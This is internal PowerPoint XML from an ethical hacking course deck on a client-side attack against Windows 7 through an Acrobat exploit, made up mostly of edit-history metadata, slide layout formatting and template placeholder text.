      <pc:chgData name="Hock Guan TAN (NP)" userId="e5f7d661-fe1a-47b6-b277-f25b08fa15d4" providerId="ADAL" clId="{18EF79FC-DAEF-4DE5-8CA4-916783548EC1}" dt="2021-04-23T07:17:01.273" v="41" actId="20577"/>
      <pc:docMkLst>
        <pc:docMk/>
      </pc:docMkLst>
      <pc:sldChg chg="modSp">
        <pc:chgData name="Hock Guan TAN (NP)" userId="e5f7d661-fe1a-47b6-b277-f25b08fa15d4" providerId="ADAL" clId="{18EF79FC-DAEF-4DE5-8CA4-916783548EC1}" dt="2021-04-23T07:16:48.942" v="37" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3405888941" sldId="494"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Hock Guan TAN (NP)" userId="e5f7d661-fe1a-47b6-b277-f25b08fa15d4" providerId="ADAL" clId="{18EF79FC-DAEF-4DE5-8CA4-916783548EC1}" dt="2021-04-23T07:16:48.942" v="37" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3405888941" sldId="494"/>
            <ac:spMk id="3" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="delSp">
        <pc:chgData name="Hock Guan TAN (NP)" userId="e5f7d661-fe1a-47b6-b277-f25b08fa15d4" providerId="ADAL" clId="{18EF79FC-DAEF-4DE5-8CA4-916783548EC1}" dt="2021-04-23T07:12:19.979" v="0" actId="478"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="204867608" sldId="495"/>
        </pc:sldMkLst>
        <pc:spChg chg="del">
          <ac:chgData name="Hock Guan TAN (NP)" userId="e5f7d661-fe1a-47b6-b277-f25b08fa15d4" providerId="ADAL" clId="{18EF79FC-DAEF-4DE5-8CA4-916783548EC1}" dt="2021-04-23T07:12:19.979" v="0" actId="478"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="204867608" sldId="495"/>
            <ac:spMk id="2" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp">
        <pc:chgData name="Hock Guan TAN (NP)" userId="e5f7d661-fe1a-47b6-b277-f25b08fa15d4" providerId="ADAL" clId="{18EF79FC-DAEF-4DE5-8CA4-916783548EC1}" dt="2021-04-23T07:17:01.273" v="41" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2417645117" sldId="518"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Hock Guan TAN (NP)" userId="e5f7d661-fe1a-47b6-b277-f25b08fa15d4" providerId="ADAL" clId="{18EF79FC-DAEF-4DE5-8CA4-916783548EC1}" dt="2021-04-23T07:17:01.273" v="41" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2417645117" sldId="518"/>
            <ac:spMk id="3" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp modSp">
        <pc:chgData name="Hock Guan TAN (NP)" userId="e5f7d661-fe1a-47b6-b277-f25b08fa15d4" providerId="ADAL" clId="{18EF79FC-DAEF-4DE5-8CA4-916783548EC1}" dt="2021-04-23T07:14:57.879" v="20" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="4209592309" sldId="527"/>
        </pc:sldMkLst>
        <pc:spChg chg="add mod">
          <ac:chgData name="Hock Guan TAN (NP)" userId="e5f7d661-fe1a-47b6-b277-f25b08fa15d4" providerId="ADAL" clId="{18EF79FC-DAEF-4DE5-8CA4-916783548EC1}" dt="2021-04-23T07:14:57.879" v="20" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4209592309" sldId="527"/>
            <ac:spMk id="5" creationId="{1921EA3C-4A7F-4753-80A7-EA931AC7F81D}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp modSp">
        <pc:chgData name="Hock Guan TAN (NP)" userId="e5f7d661-fe1a-47b6-b277-f25b08fa15d4" providerId="ADAL" clId="{18EF79FC-DAEF-4DE5-8CA4-916783548EC1}" dt="2021-04-23T07:13:49.418" v="4" actId="255"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1925166354" sldId="529"/>
        </pc:sldMkLst>
        <pc:spChg chg="add mod">
          <ac:chgData name="Hock Guan TAN (NP)" userId="e5f7d661-fe1a-47b6-b277-f25b08fa15d4" providerId="ADAL" clId="{18EF79FC-DAEF-4DE5-8CA4-916783548EC1}" dt="2021-04-23T07:13:49.418" v="4" actId="255"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1925166354" sldId="529"/>
            <ac:spMk id="7" creationId="{362A7CF9-4C1A-43AD-AF1F-FA333FB53795}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
    </pc:docChg>
  </pc:docChgLst>
  <pc:docChgLst>
    <pc:chgData name="Hock Guan TAN (NP)" userId="S::thg@np.edu.sg::e5f7d661-fe1a-47b6-b277-f25b08fa15d4" providerId="AD" clId="Web-{9CE21932-2C5E-492B-B0F7-9350DDE148B6}"/>
    <pc:docChg chg="mod addSld modSld modMainMaster">
      <pc:chgData name="Hock Guan TAN (NP)" userId="S::thg@np.edu.sg::e5f7d661-fe1a-47b6-b277-f25b08fa15d4" providerId="AD" clId="Web-{9CE21932-2C5E-492B-B0F7-9350DDE148B6}" dt="2021-04-27T22:29:38.998" v="74" actId="20577"/>
      <pc:docMkLst>
        <pc:docMk/>
      </pc:docMkLst>
      <pc:sldChg chg="modSp new">
        <pc:chgData name="Hock Guan TAN (NP)" userId="S::thg@np.edu.sg::e5f7d661-fe1a-47b6-b277-f25b08fa15d4" providerId="AD" clId="Web-{9CE21932-2C5E-492B-B0F7-9350DDE148B6}" dt="2021-04-27T22:29:38.998" v="74" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="834896883" sldId="537"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Hock Guan TAN (NP)" userId="S::thg@np.edu.sg::e5f7d661-fe1a-47b6-b277-f25b08fa15d4" providerId="AD" clId="Web-{9CE21932-2C5E-492B-B0F7-9350DDE148B6}" dt="2021-04-27T22:27:15.246" v="4" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="834896883" sldId="537"/>
            <ac:spMk id="2" creationId="{372EB4D3-75FE-43A6-BECA-521095C22D68}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Hock Guan TAN (NP)" userId="S::thg@np.edu.sg::e5f7d661-fe1a-47b6-b277-f25b08fa15d4" providerId="AD" clId="Web-{9CE21932-2C5E-492B-B0F7-9350DDE148B6}" dt="2021-04-27T22:29:38.998" v="74" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="834896883" sldId="537"/>
            <ac:spMk id="3" creationId="{5249157D-26F4-45C1-AD12-5682A7DC37D9}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldMasterChg chg="addSp">
        <pc:chgData name="Hock Guan TAN (NP)" userId="S::thg@np.edu.sg::e5f7d661-fe1a-47b6-b277-f25b08fa15d4" providerId="AD" clId="Web-{9CE21932-2C5E-492B-B0F7-9350DDE148B6}" dt="2021-04-27T22:26:48.276" v="0" actId="33475"/>
        <pc:sldMasterMkLst>
          <pc:docMk/>
          <pc:sldMasterMk cId="0" sldId="2147483650"/>
        </pc:sldMasterMkLst>
        <pc:spChg chg="add">
          <ac:chgData name="Hock Guan TAN (NP)" userId="S::thg@np.edu.sg::e5f7d661-fe1a-47b6-b277-f25b08fa15d4" providerId="AD" clId="Web-{9CE21932-2C5E-492B-B0F7-9350DDE148B6}" dt="2021-04-27T22:26:48.276" v="0" actId="33475"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMasterMk cId="0" sldId="2147483650"/>
            <ac:spMk id="3" creationId="{BAC21A70-D7D5-4378-8902-CAA10858CB31}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldMasterChg>
    </pc:docChg>
  </pc:docChgLst>
  <pc:docChgLst>
    <pc:chgData name="Hock Guan TAN (NP)" userId="e5f7d661-fe1a-47b6-b277-f25b08fa15d4" providerId="ADAL" clId="{90DC0713-5445-49D6-A35B-DBF7F1C2A4BC}"/>
    <pc:docChg chg="custSel addSld delSld modSld">
      <pc:chgData name="Hock Guan TAN (NP)" userId="e5f7d661-fe1a-47b6-b277-f25b08fa15d4" providerId="ADAL" clId="{90DC0713-5445-49D6-A35B-DBF7F1C2A4BC}" dt="2021-04-25T05:21:44.318" v="367" actId="1076"/>
      <pc:docMkLst>
        <pc:docMk/>
      </pc:docMkLst>
      <pc:sldChg chg="modSp">
        <pc:chgData name="Hock Guan TAN (NP)" userId="e5f7d661-fe1a-47b6-b277-f25b08fa15d4" providerId="ADAL" clId="{90DC0713-5445-49D6-A35B-DBF7F1C2A4BC}" dt="2021-04-25T05:15:47.021" v="186" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="111174992" sldId="512"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Hock Guan TAN (NP)" userId="e5f7d661-fe1a-47b6-b277-f25b08fa15d4" providerId="ADAL" clId="{90DC0713-5445-49D6-A35B-DBF7F1C2A4BC}" dt="2021-04-25T05:15:47.021" v="186" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="111174992" sldId="512"/>
            <ac:spMk id="3" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp add">
        <pc:chgData name="Hock Guan TAN (NP)" userId="e5f7d661-fe1a-47b6-b277-f25b08fa15d4" providerId="ADAL" clId="{90DC0713-5445-49D6-A35B-DBF7F1C2A4BC}" dt="2021-04-25T05:21:44.318" v="367" actId="1076"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2349919240" sldId="533"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Hock Guan TAN (NP)" userId="e5f7d661-fe1a-47b6-b277-f25b08fa15d4" providerId="ADAL" clId="{90DC0713-5445-49D6-A35B-DBF7F1C2A4BC}" dt="2021-04-25T05:18:57.130" v="255" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2349919240" sldId="533"/>
            <ac:spMk id="4" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Hock Guan TAN (NP)" userId="e5f7d661-fe1a-47b6-b277-f25b08fa15d4" providerId="ADAL" clId="{90DC0713-5445-49D6-A35B-DBF7F1C2A4BC}" dt="2021-04-25T05:19:56.282" v="361" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2349919240" sldId="533"/>
            <ac:spMk id="5" creationId="{123F5362-651D-4E5A-B75A-1D34386EF3BF}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="del">
          <ac:chgData name="Hock Guan TAN (NP)" userId="e5f7d661-fe1a-47b6-b277-f25b08fa15d4" providerId="ADAL" clId="{90DC0713-5445-49D6-A35B-DBF7F1C2A4BC}" dt="2021-04-25T05:18:04.919" v="190" actId="478"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2349919240" sldId="533"/>
            <ac:picMk id="3" creationId="{B4EF95A1-18FE-48EC-8F13-26BA9844E2CC}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Hock Guan TAN (NP)" userId="e5f7d661-fe1a-47b6-b277-f25b08fa15d4" providerId="ADAL" clId="{90DC0713-5445-49D6-A35B-DBF7F1C2A4BC}" dt="2021-04-25T05:21:44.318" v="367" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2349919240" sldId="533"/>
            <ac:picMk id="6" creationId="{BFC8B2E6-7315-4604-BF8F-A65950F49125}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:cxnChg chg="mod">
          <ac:chgData name="Hock Guan TAN (NP)" userId="e5f7d661-fe1a-47b6-b277-f25b08fa15d4" providerId="ADAL" clId="{90DC0713-5445-49D6-A35B-DBF7F1C2A4BC}" dt="2021-04-25T05:19:05.691" v="258" actId="1076"/>
          <ac:cxnSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2349919240" sldId="533"/>
            <ac:cxnSpMk id="7" creationId="{4422860E-4329-45E0-85A8-6102161AE278}"/>
          </ac:cxnSpMkLst>
        </pc:cxnChg>
      </pc:sldChg>
      <pc:sldChg chg="add del">
        <pc:chgData name="Hock Guan TAN (NP)" userId="e5f7d661-fe1a-47b6-b277-f25b08fa15d4" providerId="ADAL" clId="{90DC0713-5445-49D6-A35B-DBF7F1C2A4BC}" dt="2021-04-25T05:21:16.179" v="363" actId="2696"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2901325872" sldId="534"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="add del">
        <pc:chgData name="Hock Guan TAN (NP)" userId="e5f7d661-fe1a-47b6-b277-f25b08fa15d4" providerId="ADAL" clId="{90DC0713-5445-49D6-A35B-DBF7F1C2A4BC}" dt="2021-04-25T05:21:24.678" v="365" actId="2696"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="4246773827" sldId="534"/>
        </pc:sldMkLst>
      </pc:sldChg>
    </pc:docChg>
  </pc:docChgLst>
  <pc:docChgLst>
    <pc:chgData name="Hock Guan TAN (NP)" userId="e5f7d661-fe1a-47b6-b277-f25b08fa15d4" providerId="ADAL" clId="{F9BB9474-231A-439F-9164-8BA4FFE2C965}"/>
    <pc:docChg chg="modSld">
      <pc:chgData name="Hock Guan TAN (NP)" userId="e5f7d661-fe1a-47b6-b277-f25b08fa15d4" providerId="ADAL" clId="{F9BB9474-231A-439F-9164-8BA4FFE2C965}" dt="2021-04-25T04:54:42.747" v="1" actId="20577"/>
      <pc:docMkLst>
        <pc:docMk/>
      </pc:docMkLst>
      <pc:sldChg chg="modSp">
        <pc:chgData name="Hock Guan TAN (NP)" userId="e5f7d661-fe1a-47b6-b277-f25b08fa15d4" providerId="ADAL" clId="{F9BB9474-231A-439F-9164-8BA4FFE2C965}" dt="2021-04-25T04:54:42.747" v="1" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="4119940298" sldId="531"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Hock Guan TAN (NP)" userId="e5f7d661-fe1a-47b6-b277-f25b08fa15d4" providerId="ADAL" clId="{F9BB9474-231A-439F-9164-8BA4FFE2C965}" dt="2021-04-25T04:54:42.747" v="1" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4119940298" sldId="531"/>
            <ac:spMk id="5" creationId="{FF887B34-6BA9-4603-84D3-FD4A5A1F6E54}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
    </pc:docChg>
  </pc:docChgLst>
  <pc:docChgLst>
    <pc:chgData name="Hock Guan TAN (NP)" userId="e5f7d661-fe1a-47b6-b277-f25b08fa15d4" providerId="ADAL" clId="{1F40E862-1E05-4BC4-8CC4-8E8A6838E703}"/>
    <pc:docChg chg="custSel modSld">
      <pc:chgData name="Hock Guan TAN (NP)" userId="e5f7d661-fe1a-47b6-b277-f25b08fa15d4" providerId="ADAL" clId="{1F40E862-1E05-4BC4-8CC4-8E8A6838E703}" dt="2021-04-25T04:29:06.242" v="917" actId="20577"/>
      <pc:docMkLst>
        <pc:docMk/>
      </pc:docMkLst>
      <pc:sldChg chg="addSp modSp">
        <pc:chgData name="Hock Guan TAN (NP)" userId="e5f7d661-fe1a-47b6-b277-f25b08fa15d4" providerId="ADAL" clId="{1F40E862-1E05-4BC4-8CC4-8E8A6838E703}" dt="2021-04-25T04:29:06.242" v="917" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="4119940298" sldId="531"/>
        </pc:sldMkLst>
        <pc:spChg chg="add mod">
          <ac:chgData name="Hock Guan TAN (NP)" userId="e5f7d661-fe1a-47b6-b277-f25b08fa15d4" providerId="ADAL" clId="{1F40E862-1E05-4BC4-8CC4-8E8A6838E703}" dt="2021-04-25T04:29:06.242" v="917" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4119940298" sldId="531"/>
            <ac:spMk id="5" creationId="{FF887B34-6BA9-4603-84D3-FD4A5A1F6E5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731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0"/>
            <a:ext cx="2940051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t" anchorCtr="0" compatLnSpc="1">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr defTabSz="922338">
              <a:defRPr sz="1000" i="1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0"/>
            <a:ext cx="29400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t" anchorCtr="0" compatLnSpc="1">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr algn="r" defTabSz="922338">
              <a:defRPr sz="1000" i="1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063" y="746125"/>
            <a:ext cx="6545262" cy="3683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288" y="4681538"/>
            <a:ext cx="4976812" cy="443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85" tIns="46443" rIns="92885" bIns="464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88" y="9363075"/>
            <a:ext cx="2940051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b" anchorCtr="0" compatLnSpc="1">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr defTabSz="922338">
              <a:defRPr sz="1000" i="1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363075"/>
            <a:ext cx="294005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18" tIns="0" rIns="19218" bIns="0" numCol="1" anchor="b" anchorCtr="0" compatLnSpc="1">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr algn="r" defTabSz="922338">
              <a:defRPr sz="1000" i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F7D8D15-C1EE-4187-BFF7-4E97858134B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626257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922338"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922338"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922338"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922338"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58652376-84BA-45EB-ADF9-F8917EE4E4FE}" type="slidenum">
              <a:rPr lang="en-GB" altLang="en-US" sz="1000" smtClean="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>1</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB" altLang="en-US" sz="1000">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/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3" y="746125"/>
            <a:ext cx="6545262" cy="3683000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Tx/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Left-hand Bar – Replace FSP by your module code and X by the lecture number.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:buFontTx/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Replace Lecture Title</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:buFontTx/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Replace &lt; Module Name &gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:buFontTx/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Replace Year and Semester if necessary</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1213950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7D8D15-C1EE-4187-BFF7-4E97858134BB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1989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3" y="746125"/>
            <a:ext cx="6545262" cy="3683000"/>
          </a:xfrm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62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609600"/>
            <a:ext cx="10160000" cy="838200"/>
          </a:xfrm>
          <a:solidFill>
            <a:srgbClr val="0000FF"/>
          </a:solidFill>
          <a:ln w="9525"/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b"/>
          <a:lstStyle>
            <a:lvl1pPr algn="ctr">
              <a:defRPr sz="3600">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:effectLst/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Chapter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2743200"/>
            <a:ext cx="10363200" cy="2895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200">
                <a:latin typeface="Verdana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90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1421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94800" y="0"/>
            <a:ext cx="2997200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878840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916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770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0" cap="all">
                <a:effectLst/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None/>
              <a:tabLst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Master title style</a:t>
            </a:r>
          </a:p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524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5334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5200" y="1066800"/>
            <a:ext cx="5334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707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42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u="none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616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30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4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3583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4" name="Rectangle 16"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2235200" y="6400800"/>
            <a:ext cx="8331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marL="342900" indent="-342900"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lvl="1">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1200">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Diploma in ISF			</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1200" baseline="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Client Side Attack</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1200">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>EH  AY20/21, Sem 5		                                 Slide </a:t>
            </a:r>
            <a:fld id="{B3DEAB90-769D-463E-BD21-073D094AAA1B}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US" sz="1200" smtClean="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:pPr lvl="1">
                <a:spcBef>
                  <a:spcPct val="50000"/>
                </a:spcBef>
                <a:defRPr/>
              </a:pPr>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1200">
              <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
            </a:endParaRP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0931" y="895350"/>
            <a:ext cx="10871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Line 17"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="609600" y="6248400"/>
            <a:ext cx="10871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48146" name="Rectangle 18"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="0" y="-38100"/>
            <a:ext cx="12192000" cy="762000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="0033CC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endParaRPr lang="en-US" altLang="en-US" sz="2400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1988800" cy="685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</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1031" name="Picture 22" descr="School of ICT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6270630"/>
            <a:ext cx="22860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5"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8839200" y="6400800"/>
            <a:ext cx="2540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r">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
              <a:defRPr sz="12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sz="1200"/>
              <a:t>  Last update: </a:t>
            </a:r>
            <a:fld id="{FF584318-FB3D-4A4C-BEE7-3377686A3EF7}" type="datetime8">
              <a:rPr lang="en-US" sz="1200" smtClean="0"/>
              <a:t>4/27/2021 3:25 PM</a:t>
            </a:fld>
            <a:endParaRPr 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21A70-D7D5-4378-8902-CAA10858CB31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1404938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Official Open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5pPr>
      <a:lvl6pPr marL="457189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6pPr>
      <a:lvl7pPr marL="914377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7pPr>
      <a:lvl8pPr marL="1371566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8pPr>
      <a:lvl9pPr marL="1828754"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40000"/>
        <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
        <a:buChar char="§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120000"/>
        <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
        <a:buChar char="§"/>
        <a:defRPr kumimoji="1" sz="2800" b="1">
          <a:solidFill>
            <a:srgbClr val="0033CC"/>
          </a:solidFill>
          <a:latin typeface="+mn-lt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kumimoji="1" sz="2400">
          <a:solidFill>
            <a:schemeClr val="hlink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anose="05000000000000000000" pitchFamily="2" charset="2"/>
        <a:buChar char="§"/>
        <a:defRPr kumimoji="1" sz="2000">
          <a:solidFill>
            <a:srgbClr val="009900"/>
          </a:solidFill>
          <a:latin typeface="+mn-lt"/>
        </a:defRPr>
      </a:lvl5pPr>
      <a:lvl6pPr marL="2514537" indent="-228594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6pPr>
      <a:lvl7pPr marL="2971726" indent="-228594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7pPr>
      <a:lvl8pPr marL="3428914" indent="-228594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8pPr>
      <a:lvl9pPr marL="3886103" indent="-228594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90000"/>
        <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
        <a:buChar char="§"/>
        <a:defRPr kumimoji="1" sz="2000">
          <a:solidFill>
            <a:srgbClr val="009900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ftp://ftp.adobe.com/pub/adobe/reader/unix/8.x/8.1.7/enu/AdobeReader_enu-8.1.7-1.i386.de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sslinux.com/1776/how-to-install-adobe-acrobat-reader-in-ubuntu-and-linux-mint.htm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ChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="0" y="4"/>
            <a:ext cx="1828800" cy="6858000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="0033CC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 b="0">
              <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
            </a:endParaRP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38600" y="1600200"/>
            <a:ext cx="5410200" cy="1752600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US">
                <a:solidFill>
                  <a:srgbClr val="0033CC"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Client Side Attack – </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US">
                <a:solidFill>
                  <a:srgbClr val="0033CC"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Penetrate into Windows 7 through an Acrobat Exploit</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="129038" name="Rectangle 14"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4114800" y="4648200"/>
            <a:ext cx="5486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kumimoji="1" lang="en-US" altLang="en-US">
                <a:latin typeface="Arial Narrow" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Ethnical Hacking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40000"/>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="en-GB" altLang="en-US">
                <a:latin typeface="Arial Narrow" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Diploma in </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN">
